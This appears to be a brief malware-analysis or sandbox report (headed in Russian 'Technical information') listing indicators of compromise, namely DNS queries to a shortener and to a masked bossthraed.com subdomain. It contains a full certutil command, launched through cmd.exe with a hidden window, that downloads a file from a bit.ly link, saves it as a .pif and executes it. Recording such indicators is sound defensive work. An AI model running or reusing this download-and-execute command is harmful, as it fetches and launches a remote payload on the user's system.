Техническая информация
- '<SYSTEM32>\cmd.exe' /ccertutil -urlcache -split -f http://bit.ly/2ZIBqHa 0989434.pif& 0989434.pif
- 'bi#.ly':80
- http://bi#.ly/2ZIBqHa
- DNS ASK bi#.ly
- DNS ASK se####.bossthraed.com
- '<SYSTEM32>\cmd.exe' /ccertutil -urlcache -split -f http://bit.ly/2ZIBqHa 0989434.pif& 0989434.pif' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://bit.ly/2ZIBqHa 0989434.pif